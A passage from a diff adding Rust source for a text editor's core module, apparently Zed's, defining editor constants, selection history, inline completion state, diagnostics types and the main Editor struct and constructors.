CURSOR_BLINK_INTERVAL: Duration = Duration::from_millis(500); +const MAX_LINE_LEN: usize = 1024; +const MIN_NAVIGATION_HISTORY_ROW_DELTA: i64 = 10; +const MAX_SELECTION_HISTORY_LEN: usize = 1024; +pub(crate) const CURSORS_VISIBLE_FOR: Duration = Duration::from_millis(2000); +#[doc(hidden)] +pub const CODE_ACTIONS_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(250); +const SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(100); + +pub(crate) const CODE_ACTION_TIMEOUT: Duration = Duration::from_secs(5); +pub(crate) const FORMAT_TIMEOUT: Duration = Duration::from_secs(5); +pub(crate) const SCROLL_CENTER_TOP_BOTTOM_DEBOUNCE_TIMEOUT: Duration = Duration::from_secs(1); + +pub(crate) const EDIT_PREDICTION_KEY_CONTEXT: &str = "edit_prediction"; +pub(crate) const EDIT_PREDICTION_CONFLICT_KEY_CONTEXT: &str = "edit_prediction_conflict"; +pub(crate) const MIN_LINE_NUMBER_DIGITS: u32 = 4; + +pub type RenderDiffHunkControlsFn = Arc< + dyn Fn( + u32, + &DiffHunkStatus, + Range, + bool, + Pixels, + &Entity, + &mut Window, + &mut App, + ) -> AnyElement, +>; + +const COLUMNAR_SELECTION_MODIFIERS: Modifiers = Modifiers { + alt: true, + shift: true, + control: false, + platform: false, + function: false, +}; + +struct InlineValueCache { + enabled: bool, + inlays: Vec, + refresh_task: Task>, +} + +impl InlineValueCache { + fn new(enabled: bool) -> Self { + Self { + enabled, + inlays: Vec::new(), + refresh_task: Task::ready(None), + } + } +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)] +pub enum InlayId { + InlineCompletion(usize), + Hint(usize), + DebuggerValue(usize), +} + +impl InlayId { + fn id(&self) -> usize { + match self { + Self::InlineCompletion(id) => *id, + Self::Hint(id) => *id, + Self::DebuggerValue(id) => *id, + } + } +} + +pub enum ActiveDebugLine {} +enum DocumentHighlightRead {} +enum DocumentHighlightWrite {} +enum InputComposition {} +enum SelectedTextHighlight {} + +pub enum ConflictsOuter {} +pub enum ConflictsOurs {} +pub enum ConflictsTheirs {} +pub enum ConflictsOursMarker {} +pub enum ConflictsTheirsMarker {} + +#[derive(Debug, Copy, Clone, PartialEq, Eq)] +pub enum Navigated { + Yes, + No, +} + +impl Navigated { + pub fn from_bool(yes: bool) -> Navigated { + if yes { Navigated::Yes } else { Navigated::No } + } +} + +#[derive(Debug, Clone, PartialEq, Eq)] +enum DisplayDiffHunk { + Folded { + display_row: DisplayRow, + }, + Unfolded { + is_created_file: bool, + diff_base_byte_range: Range, + display_row_range: Range, + multi_buffer_range: Range, + status: DiffHunkStatus, + }, +} + +pub enum HideMouseCursorOrigin { + TypingAction, + MovementAction, +} + +pub fn init_settings(cx: &mut App) { + EditorSettings::register(cx); +} + +pub fn init(cx: &mut App) { + init_settings(cx); + + cx.set_global(GlobalBlameRenderer(Arc::new(()))); + + workspace::register_project_item::(cx); + workspace::FollowableViewRegistry::register::(cx); + workspace::register_serializable_item::(cx); + + cx.observe_new( + |workspace: &mut Workspace, _: Option<&mut Window>, _cx: &mut Context| { + workspace.register_action(Editor::new_file); + workspace.register_action(Editor::new_file_vertical); + workspace.register_action(Editor::new_file_horizontal); + workspace.register_action(Editor::cancel_language_server_work); + }, + ) + .detach(); + + cx.on_action(move |_: &workspace::NewFile, cx| { + let app_state = workspace::AppState::global(cx); + if let Some(app_state) = app_state.upgrade() { + workspace::open_new( + Default::default(), + app_state, + cx, + |workspace, window, cx| { + Editor::new_file(workspace, &Default::default(), window, cx) + }, + ) + .detach(); + } + }); + cx.on_action(move |_: &workspace::NewWindow, cx| { + let app_state = workspace::AppState::global(cx); + if let Some(app_state) = app_state.upgrade() { + workspace::open_new( + Default::default(), + app_state, + cx, + |workspace, window, cx| { + cx.activate(true); + Editor::new_file(workspace, &Default::default(), window, cx) + }, + ) + .detach(); + } + }); +} + +pub fn set_blame_renderer(renderer: impl BlameRenderer + 'static, cx: &mut App) { + cx.set_global(GlobalBlameRenderer(Arc::new(renderer))); +} + +pub trait DiagnosticRenderer { + fn render_group( + &self, + diagnostic_group: Vec>, + buffer_id: BufferId, + snapshot: EditorSnapshot, + editor: WeakEntity, + cx: &mut App, + ) -> Vec>; + + fn render_hover( + &self, + diagnostic_group: Vec>, + range: Range, + buffer_id: BufferId, + cx: &mut App, + ) -> Option>; + + fn open_link( + &self, + editor: &mut Editor, + link: SharedString, + window: &mut Window, + cx: &mut Context, + ); +} + +pub(crate) struct GlobalDiagnosticRenderer(pub Arc); + +impl GlobalDiagnosticRenderer { + fn global(cx: &App) -> Option> { + cx.try_global::().map(|g| g.0.clone()) + } +} + +impl gpui::Global for GlobalDiagnosticRenderer {} +pub fn set_diagnostic_renderer(renderer: impl DiagnosticRenderer + 'static, cx: &mut App) { + cx.set_global(GlobalDiagnosticRenderer(Arc::new(renderer))); +} + +pub struct SearchWithinRange; + +trait InvalidationRegion { + fn ranges(&self) -> &[Range]; +} + +#[derive(Clone, Debug, PartialEq)] +pub enum SelectPhase { + Begin { + position: DisplayPoint, + add: bool, + click_count: usize, + }, + BeginColumnar { + position: DisplayPoint, + reset: bool, + goal_column: u32, + }, + Extend { + position: DisplayPoint, + click_count: usize, + }, + Update { + position: DisplayPoint, + goal_column: u32, + scroll_delta: gpui::Point, + }, + End, +} + +#[derive(Clone, Debug)] +pub enum SelectMode { + Character, + Word(Range), + Line(Range), + All, +} + +#[derive(Copy, Clone, PartialEq, Eq, Debug)] +pub enum EditorMode { + SingleLine { + auto_width: bool, + }, + AutoHeight { + max_lines: usize, + }, + Full { + /// When set to `true`, the editor will scale its UI elements with the buffer font size. + scale_ui_elements_with_buffer_font_size: bool, + /// When set to `true`, the editor will render a background for the active line. + show_active_line_background: bool, + /// When set to `true`, the editor's height will be determined by its content. + sized_by_content: bool, + }, +} + +impl EditorMode { + pub fn full() -> Self { + Self::Full { + scale_ui_elements_with_buffer_font_size: true, + show_active_line_background: true, + sized_by_content: false, + } + } + + pub fn is_full(&self) -> bool { + matches!(self, Self::Full { .. }) + } +} + +#[derive(Copy, Clone, Debug)] +pub enum SoftWrap { + /// Prefer not to wrap at all. + /// + /// Note: this is currently internal, as actually limited by [`crate::MAX_LINE_LEN`] until it wraps. + /// The mode is used inside git diff hunks, where it's seems currently more useful to not wrap as much as possible. + GitDiff, + /// Prefer a single line generally, unless an overly long line is encountered. + None, + /// Soft wrap lines that exceed the editor width. + EditorWidth, + /// Soft wrap lines at the preferred line length. + Column(u32), + /// Soft wrap line at the preferred line length or the editor width (whichever is smaller). + Bounded(u32), +} + +#[derive(Clone)] +pub struct EditorStyle { + pub background: Hsla, + pub local_player: PlayerColor, + pub text: TextStyle, + pub scrollbar_width: Pixels, + pub syntax: Arc, + pub status: StatusColors, + pub inlay_hints_style: HighlightStyle, + pub inline_completion_styles: InlineCompletionStyles, + pub unnecessary_code_fade: f32, +} + +impl Default for EditorStyle { + fn default() -> Self { + Self { + background: Hsla::default(), + local_player: PlayerColor::default(), + text: TextStyle::default(), + scrollbar_width: Pixels::default(), + syntax: Default::default(), + // HACK: Status colors don't have a real default. + // We should look into removing the status colors from the editor + // style and retrieve them directly from the theme. + status: StatusColors::dark(), + inlay_hints_style: HighlightStyle::default(), + inline_completion_styles: InlineCompletionStyles { + insertion: HighlightStyle::default(), + whitespace: HighlightStyle::default(), + }, + unnecessary_code_fade: Default::default(), + } + } +} + +pub fn make_inlay_hints_style(cx: &mut App) -> HighlightStyle { + let show_background = language_settings::language_settings(None, None, cx) + .inlay_hints + .show_background; + + HighlightStyle { + color: Some(cx.theme().status().hint), + background_color: show_background.then(|| cx.theme().status().hint_background), + ..HighlightStyle::default() + } +} + +pub fn make_suggestion_styles(cx: &mut App) -> InlineCompletionStyles { + InlineCompletionStyles { + insertion: HighlightStyle { + color: Some(cx.theme().status().predictive), + ..HighlightStyle::default() + }, + whitespace: HighlightStyle { + background_color: Some(cx.theme().status().created_background), + ..HighlightStyle::default() + }, + } +} + +type CompletionId = usize; + +pub(crate) enum EditDisplayMode { + TabAccept, + DiffPopover, + Inline, +} + +enum InlineCompletion { + Edit { + edits: Vec<(Range, String)>, + edit_preview: Option, + display_mode: EditDisplayMode, + snapshot: BufferSnapshot, + }, + Move { + target: Anchor, + snapshot: BufferSnapshot, + }, +} + +struct InlineCompletionState { + inlay_ids: Vec, + completion: InlineCompletion, + completion_id: Option, + invalidation_range: Range, +} + +enum EditPredictionSettings { + Disabled, + Enabled { + show_in_menu: bool, + preview_requires_modifier: bool, + }, +} + +enum InlineCompletionHighlight {} + +#[derive(Debug, Clone)] +struct InlineDiagnostic { + message: SharedString, + group_id: usize, + is_primary: bool, + start: Point, + severity: DiagnosticSeverity, +} + +pub enum MenuInlineCompletionsPolicy { + Never, + ByProvider, +} + +pub enum EditPredictionPreview { + /// Modifier is not pressed + Inactive { released_too_fast: bool }, + /// Modifier pressed + Active { + since: Instant, + previous_scroll_position: Option, + }, +} + +impl EditPredictionPreview { + pub fn released_too_fast(&self) -> bool { + match self { + EditPredictionPreview::Inactive { released_too_fast } => *released_too_fast, + EditPredictionPreview::Active { .. } => false, + } + } + + pub fn set_previous_scroll_position(&mut self, scroll_position: Option) { + if let EditPredictionPreview::Active { + previous_scroll_position, + .. + } = self + { + *previous_scroll_position = scroll_position; + } + } +} + +pub struct ContextMenuOptions { + pub min_entries_visible: usize, + pub max_entries_visible: usize, + pub placement: Option, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum ContextMenuPlacement { + Above, + Below, +} + +#[derive(Copy, Clone, Eq, PartialEq, PartialOrd, Ord, Debug, Default)] +struct EditorActionId(usize); + +impl EditorActionId { + pub fn post_inc(&mut self) -> Self { + let answer = self.0; + + *self = Self(answer + 1); + + Self(answer) + } +} + +// type GetFieldEditorTheme = dyn Fn(&theme::Theme) -> theme::FieldEditor; +// type OverrideTextStyle = dyn Fn(&EditorStyle) -> Option; + +type BackgroundHighlight = (fn(&ThemeColors) -> Hsla, Arc<[Range]>); +type GutterHighlight = (fn(&App) -> Hsla, Arc<[Range]>); + +#[derive(Default)] +struct ScrollbarMarkerState { + scrollbar_size: Size, + dirty: bool, + markers: Arc<[PaintQuad]>, + pending_refresh: Option>>, +} + +impl ScrollbarMarkerState { + fn should_refresh(&self, scrollbar_size: Size) -> bool { + self.pending_refresh.is_none() && (self.scrollbar_size != scrollbar_size || self.dirty) + } +} + +#[derive(Clone, Debug)] +struct RunnableTasks { + templates: Vec<(TaskSourceKind, TaskTemplate)>, + offset: multi_buffer::Anchor, + // We need the column at which the task context evaluation should take place (when we're spawning it via gutter). + column: u32, + // Values of all named captures, including those starting with '_' + extra_variables: HashMap, + // Full range of the tagged region. We use it to determine which `extra_variables` to grab for context resolution in e.g. a modal. + context_range: Range, +} + +impl RunnableTasks { + fn resolve<'a>( + &'a self, + cx: &'a task::TaskContext, + ) -> impl Iterator + 'a { + self.templates.iter().filter_map(|(kind, template)| { + template + .resolve_task(&kind.to_id_base(), cx) + .map(|task| (kind.clone(), task)) + }) + } +} + +#[derive(Clone)] +struct ResolvedTasks { + templates: SmallVec<[(TaskSourceKind, ResolvedTask); 1]>, + position: Anchor, +} + +#[derive(Copy, Clone, Debug, PartialEq, PartialOrd)] +struct BufferOffset(usize); + +// Addons allow storing per-editor state in other crates (e.g. Vim) +pub trait Addon: 'static { + fn extend_key_context(&self, _: &mut KeyContext, _: &App) {} + + fn render_buffer_header_controls( + &self, + _: &ExcerptInfo, + _: &Window, + _: &App, + ) -> Option { + None + } + + fn to_any(&self) -> &dyn std::any::Any; + + fn to_any_mut(&mut self) -> Option<&mut dyn std::any::Any> { + None + } +} + +/// A set of caret positions, registered when the editor was edited. +pub struct ChangeList { + changes: Vec>, + /// Currently "selected" change. + position: Option, +} + +impl ChangeList { + pub fn new() -> Self { + Self { + changes: Vec::new(), + position: None, + } + } + + /// Moves to the next change in the list (based on the direction given) and returns the caret positions for the next change. + /// If reaches the end of the list in the direction, returns the corresponding change until called for a different direction. + pub fn next_change(&mut self, count: usize, direction: Direction) -> Option<&[Anchor]> { + if self.changes.is_empty() { + return None; + } + + let prev = self.position.unwrap_or(self.changes.len()); + let next = if direction == Direction::Prev { + prev.saturating_sub(count) + } else { + (prev + count).min(self.changes.len() - 1) + }; + self.position = Some(next); + self.changes.get(next).map(|anchors| anchors.as_slice()) + } + + /// Adds a new change to the list, resetting the change list position. + pub fn push_to_change_list(&mut self, pop_state: bool, new_positions: Vec) { + self.position.take(); + if pop_state { + self.changes.pop(); + } + self.changes.push(new_positions.clone()); + } + + pub fn last(&self) -> Option<&[Anchor]> { + self.changes.last().map(|anchors| anchors.as_slice()) + } +} + +#[derive(Clone)] +struct InlineBlamePopoverState { + scroll_handle: ScrollHandle, + commit_message: Option, + markdown: Entity, +} + +struct InlineBlamePopover { + position: gpui::Point, + show_task: Option>, + hide_task: Option>, + popover_bounds: Option>, + popover_state: InlineBlamePopoverState, +} + +/// Represents a breakpoint indicator that shows up when hovering over lines in the gutter that don't have +/// a breakpoint on them. +#[derive(Clone, Copy, Debug)] +struct PhantomBreakpointIndicator { + display_row: DisplayRow, + /// There's a small debounce between hovering over the line and showing the indicator. + /// We don't want to show the indicator when moving the mouse from editor to e.g. project panel. + is_active: bool, + collides_with_existing_breakpoint: bool, +} +/// Zed's primary implementation of text input, allowing users to edit a [`MultiBuffer`]. +/// +/// See the [module level documentation](self) for more information. +pub struct Editor { + focus_handle: FocusHandle, + last_focused_descendant: Option, + /// The text buffer being edited + buffer: Entity, + /// Map of how text in the buffer should be displayed. + /// Handles soft wraps, folds, fake inlay text insertions, etc. + pub display_map: Entity, + pub selections: SelectionsCollection, + pub scroll_manager: ScrollManager, + /// When inline assist editors are linked, they all render cursors because + /// typing enters text into each of them, even the ones that aren't focused. + pub(crate) show_cursor_when_unfocused: bool, + columnar_selection_tail: Option, + add_selections_state: Option, + select_next_state: Option, + select_prev_state: Option, + selection_history: SelectionHistory, + autoclose_regions: Vec, + snippet_stack: InvalidationStack, + select_syntax_node_history: SelectSyntaxNodeHistory, + ime_transaction: Option, + active_diagnostics: ActiveDiagnostic, + show_inline_diagnostics: bool, + inline_diagnostics_update: Task<()>, + inline_diagnostics_enabled: bool, + inline_diagnostics: Vec<(Anchor, InlineDiagnostic)>, + soft_wrap_mode_override: Option, + hard_wrap: Option, + + // TODO: make this a access method + pub project: Option>, + semantics_provider: Option>, + completion_provider: Option>, + collaboration_hub: Option>, + blink_manager: Entity, + show_cursor_names: bool, + hovered_cursors: HashMap>, + pub show_local_selections: bool, + mode: EditorMode, + show_breadcrumbs: bool, + show_gutter: bool, + show_scrollbars: bool, + disable_scrolling: bool, + disable_expand_excerpt_buttons: bool, + show_line_numbers: Option, + use_relative_line_numbers: Option, + show_git_diff_gutter: Option, + show_code_actions: Option, + show_runnables: Option, + show_breakpoints: Option, + show_wrap_guides: Option, + show_indent_guides: Option, + placeholder_text: Option>, + highlight_order: usize, + highlighted_rows: HashMap>, + background_highlights: TreeMap, + gutter_highlights: TreeMap, + scrollbar_marker_state: ScrollbarMarkerState, + active_indent_guides_state: ActiveIndentGuidesState, + nav_history: Option, + context_menu: RefCell>, + context_menu_options: Option, + mouse_context_menu: Option, + completion_tasks: Vec<(CompletionId, Task>)>, + inline_blame_popover: Option, + signature_help_state: SignatureHelpState, + auto_signature_help: Option, + find_all_references_task_sources: Vec, + next_completion_id: CompletionId, + available_code_actions: Option<(Location, Rc<[AvailableCodeAction]>)>, + code_actions_task: Option>>, + quick_selection_highlight_task: Option<(Range, Task<()>)>, + debounced_selection_highlight_task: Option<(Range, Task<()>)>, + document_highlights_task: Option>, + linked_editing_range_task: Option>>, + linked_edit_ranges: linked_editing_ranges::LinkedEditingRanges, + pending_rename: Option, + searchable: bool, + cursor_shape: CursorShape, + current_line_highlight: Option, + collapse_matches: bool, + autoindent_mode: Option, + workspace: Option<(WeakEntity, Option)>, + input_enabled: bool, + use_modal_editing: bool, + read_only: bool, + leader_peer_id: Option, + remote_id: Option, + pub hover_state: HoverState, + pending_mouse_down: Option>>>, + gutter_hovered: bool, + hovered_link_state: Option, + edit_prediction_provider: Option, + code_action_providers: Vec>, + active_inline_completion: Option, + /// Used to prevent flickering as the user types while the menu is open + stale_inline_completion_in_menu: Option, + edit_prediction_settings: EditPredictionSettings, + inline_completions_hidden_for_vim_mode: bool, + show_inline_completions_override: Option, + menu_inline_completions_policy: MenuInlineCompletionsPolicy, + edit_prediction_preview: EditPredictionPreview, + edit_prediction_indent_conflict: bool, + edit_prediction_requires_modifier_in_indent_conflict: bool, + inlay_hint_cache: InlayHintCache, + next_inlay_id: usize, + _subscriptions: Vec, + pixel_position_of_newest_cursor: Option>, + gutter_dimensions: GutterDimensions, + style: Option, + text_style_refinement: Option, + next_editor_action_id: EditorActionId, + editor_actions: + Rc)>>>>, + use_autoclose: bool, + use_auto_surround: bool, + auto_replace_emoji_shortcode: bool, + jsx_tag_auto_close_enabled_in_any_buffer: bool, + show_git_blame_gutter: bool, + show_git_blame_inline: bool, + show_git_blame_inline_delay_task: Option>, + git_blame_inline_enabled: bool, + render_diff_hunk_controls: RenderDiffHunkControlsFn, + serialize_dirty_buffers: bool, + show_selection_menu: Option, + blame: Option>, + blame_subscription: Option, + custom_context_menu: Option< + Box< + dyn 'static + + Fn( + &mut Self, + DisplayPoint, + &mut Window, + &mut Context, + ) -> Option>, + >, + >, + last_bounds: Option>, + last_position_map: Option>, + expect_bounds_change: Option>, + tasks: BTreeMap<(BufferId, BufferRow), RunnableTasks>, + tasks_update_task: Option>, + breakpoint_store: Option>, + gutter_breakpoint_indicator: (Option, Option>), + in_project_search: bool, + previous_search_ranges: Option]>>, + breadcrumb_header: Option, + focused_block: Option, + next_scroll_position: NextScrollCursorCenterTopBottom, + addons: HashMap>, + registered_buffers: HashMap, + load_diff_task: Option>>, + selection_mark_mode: bool, + toggle_fold_multiple_buffers: Task<()>, + _scroll_cursor_center_top_bottom_task: Task<()>, + serialize_selections: Task<()>, + serialize_folds: Task<()>, + mouse_cursor_hidden: bool, + hide_mouse_mode: HideMouseMode, + pub change_list: ChangeList, + inline_value_cache: InlineValueCache, +} + +#[derive(Copy, Clone, Debug, PartialEq, Eq, Default)] +enum NextScrollCursorCenterTopBottom { + #[default] + Center, + Top, + Bottom, +} + +impl NextScrollCursorCenterTopBottom { + fn next(&self) -> Self { + match self { + Self::Center => Self::Top, + Self::Top => Self::Bottom, + Self::Bottom => Self::Center, + } + } +} + +#[derive(Clone)] +pub struct EditorSnapshot { + pub mode: EditorMode, + show_gutter: bool, + show_line_numbers: Option, + show_git_diff_gutter: Option, + show_code_actions: Option, + show_runnables: Option, + show_breakpoints: Option, + git_blame_gutter_max_author_length: Option, + pub display_snapshot: DisplaySnapshot, + pub placeholder_text: Option>, + is_focused: bool, + scroll_anchor: ScrollAnchor, + ongoing_scroll: OngoingScroll, + current_line_highlight: CurrentLineHighlight, + gutter_hovered: bool, +} + +#[derive(Default, Debug, Clone, Copy)] +pub struct GutterDimensions { + pub left_padding: Pixels, + pub right_padding: Pixels, + pub width: Pixels, + pub margin: Pixels, + pub git_blame_entries_width: Option, +} + +impl GutterDimensions { + /// The full width of the space taken up by the gutter. + pub fn full_width(&self) -> Pixels { + self.margin + self.width + } + + /// The width of the space reserved for the fold indicators, + /// use alongside 'justify_end' and `gutter_width` to + /// right align content with the line numbers + pub fn fold_area_width(&self) -> Pixels { + self.margin + self.right_padding + } +} + +#[derive(Debug)] +pub struct RemoteSelection { + pub replica_id: ReplicaId, + pub selection: Selection, + pub cursor_shape: CursorShape, + pub peer_id: PeerId, + pub line_mode: bool, + pub participant_index: Option, + pub user_name: Option, +} + +#[derive(Clone, Debug)] +struct SelectionHistoryEntry { + selections: Arc<[Selection]>, + select_next_state: Option, + select_prev_state: Option, + add_selections_state: Option, +} + +enum SelectionHistoryMode { + Normal, + Undoing, + Redoing, +} + +#[derive(Clone, PartialEq, Eq, Hash)] +struct HoveredCursor { + replica_id: u16, + selection_id: usize, +} + +impl Default for SelectionHistoryMode { + fn default() -> Self { + Self::Normal + } +} + +#[derive(Default)] +struct SelectionHistory { + #[allow(clippy::type_complexity)] + selections_by_transaction: + HashMap]>, Option]>>)>, + mode: SelectionHistoryMode, + undo_stack: VecDeque, + redo_stack: VecDeque, +} + +impl SelectionHistory { + fn insert_transaction( + &mut self, + transaction_id: TransactionId, + selections: Arc<[Selection]>, + ) { + self.selections_by_transaction + .insert(transaction_id, (selections, None)); + } + + #[allow(clippy::type_complexity)] + fn transaction( + &self, + transaction_id: TransactionId, + ) -> Option<&(Arc<[Selection]>, Option]>>)> { + self.selections_by_transaction.get(&transaction_id) + } + + #[allow(clippy::type_complexity)] + fn transaction_mut( + &mut self, + transaction_id: TransactionId, + ) -> Option<&mut (Arc<[Selection]>, Option]>>)> { + self.selections_by_transaction.get_mut(&transaction_id) + } + + fn push(&mut self, entry: SelectionHistoryEntry) { + if !entry.selections.is_empty() { + match self.mode { + SelectionHistoryMode::Normal => { + self.push_undo(entry); + self.redo_stack.clear(); + } + SelectionHistoryMode::Undoing => self.push_redo(entry), + SelectionHistoryMode::Redoing => self.push_undo(entry), + } + } + } + + fn push_undo(&mut self, entry: SelectionHistoryEntry) { + if self + .undo_stack + .back() + .map_or(true, |e| e.selections != entry.selections) + { + self.undo_stack.push_back(entry); + if self.undo_stack.len() > MAX_SELECTION_HISTORY_LEN { + self.undo_stack.pop_front(); + } + } + } + + fn push_redo(&mut self, entry: SelectionHistoryEntry) { + if self + .redo_stack + .back() + .map_or(true, |e| e.selections != entry.selections) + { + self.redo_stack.push_back(entry); + if self.redo_stack.len() > MAX_SELECTION_HISTORY_LEN { + self.redo_stack.pop_front(); + } + } + } +} + +#[derive(Clone, Copy)] +pub struct RowHighlightOptions { + pub autoscroll: bool, + pub include_gutter: bool, +} + +impl Default for RowHighlightOptions { + fn default() -> Self { + Self { + autoscroll: Default::default(), + include_gutter: true, + } + } +} + +struct RowHighlight { + index: usize, + range: Range, + color: Hsla, + options: RowHighlightOptions, + type_id: TypeId, +} + +#[derive(Clone, Debug)] +struct AddSelectionsState { + above: bool, + stack: Vec, +} + +#[derive(Clone)] +struct SelectNextState { + query: AhoCorasick, + wordwise: bool, + done: bool, +} + +impl std::fmt::Debug for SelectNextState { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + f.debug_struct(std::any::type_name::()) + .field("wordwise", &self.wordwise) + .field("done", &self.done) + .finish() + } +} + +#[derive(Debug)] +struct AutocloseRegion { + selection_id: usize, + range: Range, + pair: BracketPair, +} + +#[derive(Debug)] +struct SnippetState { + ranges: Vec>>, + active_index: usize, + choices: Vec>>, +} + +#[doc(hidden)] +pub struct RenameState { + pub range: Range, + pub old_name: Arc, + pub editor: Entity, + block_id: CustomBlockId, +} + +struct InvalidationStack(Vec); + +struct RegisteredInlineCompletionProvider { + provider: Arc, + _subscription: Subscription, +} + +#[derive(Debug, PartialEq, Eq)] +pub struct ActiveDiagnosticGroup { + pub active_range: Range, + pub active_message: String, + pub group_id: usize, + pub blocks: HashSet, +} + +#[derive(Debug, PartialEq, Eq)] + +pub(crate) enum ActiveDiagnostic { + None, + All, + Group(ActiveDiagnosticGroup), +} + +#[derive(Serialize, Deserialize, Clone, Debug)] +pub struct ClipboardSelection { + /// The number of bytes in this selection. + pub len: usize, + /// Whether this was a full-line selection. + pub is_entire_line: bool, + /// The indentation of the first line when this content was originally copied. + pub first_line_indent: u32, +} + +// selections, scroll behavior, was newest selection reversed +type SelectSyntaxNodeHistoryState = ( + Box<[Selection]>, + SelectSyntaxNodeScrollBehavior, + bool, +); + +#[derive(Default)] +struct SelectSyntaxNodeHistory { + stack: Vec, + // disable temporarily to allow changing selections without losing the stack + pub disable_clearing: bool, +} + +impl SelectSyntaxNodeHistory { + pub fn try_clear(&mut self) { + if !self.disable_clearing { + self.stack.clear(); + } + } + + pub fn push(&mut self, selection: SelectSyntaxNodeHistoryState) { + self.stack.push(selection); + } + + pub fn pop(&mut self) -> Option { + self.stack.pop() + } +} + +enum SelectSyntaxNodeScrollBehavior { + CursorTop, + FitSelection, + CursorBottom, +} + +#[derive(Debug)] +pub(crate) struct NavigationData { + cursor_anchor: Anchor, + cursor_position: Point, + scroll_anchor: ScrollAnchor, + scroll_top_row: u32, +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum GotoDefinitionKind { + Symbol, + Declaration, + Type, + Implementation, +} + +#[derive(Debug, Clone)] +enum InlayHintRefreshReason { + ModifiersChanged(bool), + Toggle(bool), + SettingsChange(InlayHintSettings), + NewLinesShown, + BufferEdited(HashSet>), + RefreshRequested, + ExcerptsRemoved(Vec), +} + +impl InlayHintRefreshReason { + fn description(&self) -> &'static str { + match self { + Self::ModifiersChanged(_) => "modifiers changed", + Self::Toggle(_) => "toggle", + Self::SettingsChange(_) => "settings change", + Self::NewLinesShown => "new lines shown", + Self::BufferEdited(_) => "buffer edited", + Self::RefreshRequested => "refresh requested", + Self::ExcerptsRemoved(_) => "excerpts removed", + } + } +} + +pub enum FormatTarget { + Buffers, + Ranges(Vec>), +} + +pub(crate) struct FocusedBlock { + id: BlockId, + focus_handle: WeakFocusHandle, +} + +#[derive(Clone)] +enum JumpData { + MultiBufferRow { + row: MultiBufferRow, + line_offset_from_top: u32, + }, + MultiBufferPoint { + excerpt_id: ExcerptId, + position: Point, + anchor: text::Anchor, + line_offset_from_top: u32, + }, +} + +pub enum MultibufferSelectionMode { + First, + All, +} + +#[derive(Clone, Copy, Debug, Default)] +pub struct RewrapOptions { + pub override_language_settings: bool, + pub preserve_existing_whitespace: bool, +} + +impl Editor { + pub fn single_line(window: &mut Window, cx: &mut Context) -> Self { + let buffer = cx.new(|cx| Buffer::local("", cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new( + EditorMode::SingleLine { auto_width: false }, + buffer, + None, + window, + cx, + ) + } + + pub fn multi_line(window: &mut Window, cx: &mut Context) -> Self { + let buffer = cx.new(|cx| Buffer::local("", cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new(EditorMode::full(), buffer, None, window, cx) + } + + pub fn auto_width(window: &mut Window, cx: &mut Context) -> Self { + let buffer = cx.new(|cx| Buffer::local("", cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new( + EditorMode::SingleLine { auto_width: true }, + buffer, + None, + window, + cx, + ) + } + + pub fn auto_height(max_lines: usize, window: &mut Window, cx: &mut Context) -> Self { + let buffer = cx.new(|cx| Buffer::local("", cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new( + EditorMode::AutoHeight { max_lines }, + buffer, + None, + window, + cx, + ) + } + + pub fn for_buffer( + buffer: Entity, + project: Option>, + window: &mut Window, + cx: &mut Context, + ) -> Self { + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new(EditorMode::full(), buffer, project, window, cx) + } + + pub fn for_multibuffer( + buffer: Entity, + project: Option>, + window: &mut Window, + cx: &mut Context, + ) -> Self { + Self::new(EditorMode::full(), buffer, project, window, cx) + } + + pub fn clone(&self, window: &mut Window, cx: &mut Context) -> Self { + let mut clone = Self::new( + self.mode, + self.buffer.clone(), + self.project.clone(), + window, + cx, + ); + self.display_map.update(cx, |display_map, cx| { + let snapshot = display_map.snapshot(cx); + clone.display_map.update(cx, |display_map, cx| { + display_map.set_state(&snapshot, cx); + }); + }); + clone.folds_did_change(cx); + clone.selections.clone_state(&self.selections); + clone.scroll_manager.clone_state(&self.scroll_manager); + clone.searchable = self.searchable; + clone.read_only = self.read_only; + clone + } + + pub fn new( + mode: EditorMode, + buffer: Entity, + project: Option>, + window: &mut Window, + cx: &mut Context, + ) -> Self { + let style = window.text_style(); + let font_size = style.font_size.to_pixels(window.rem_size()); + let editor = cx.entity().downgrade(); + let fold_placeholder = FoldPlaceholder { + constrain_width: true, + render: Arc::new(move |fold_id, fold_range, cx| { + let editor = editor.clone(); + div() + .id(fold_id) + .bg(cx.theme().colors().ghost_element_background) + .hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) + .active(|style| style.bg(cx.theme().colors().ghost_element_active)) + .rounded_xs() + .size_full() + .cursor_pointer() + .child("⋯") + .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) + .on_click(move |_, _window, cx| { + editor + .update(cx, |editor, cx| { + editor.unfold_ranges( + &[fold_range.start..fold_range.end], + true, + false, + cx, + ); + cx.stop_propagation(); + }) + .ok(); + }) + .into_any() + }), + merge_adjacent: true, + ..Default::default() + }; + let display_map = cx.new(|cx| { + DisplayMap::new( + buffer.clone(), + style.font(), + font_size, + None, + FILE_HEADER_HEIGHT, + MULTI_BUFFER_EXCERPT_HEADER_HEIGHT, + fold_placeholder, + cx, + ) + }); + + let selections = SelectionsCollection::new(display_map.clone(), buffer.clone()); + + let blink_manager = cx.new(|cx| BlinkManager::new(CURSOR_BLINK_INTERVAL, cx)); + + let soft_wrap_mode_override = matches!(mode, EditorMode::SingleLine { .. }) + .then(|| language_settings::SoftWrap::None); + + let mut project_subscriptions = Vec::new(); + if mode.is_full() { + if let Some(project) = project.as_ref() { + project_subscriptions.push(cx.subscribe_in( + project, + window, + |editor, _, event, window, cx| match event { + project::Event::RefreshCodeLens => { + // we always query lens with actions, without storing them, always refreshing them + } + project::Event::RefreshInlayHints => { + editor + .refresh_inlay_hints(InlayHintRefreshReason::RefreshRequested, cx); + } + project::Event::SnippetEdit(id, snippet_edits) => { + if let Some(buffer) = 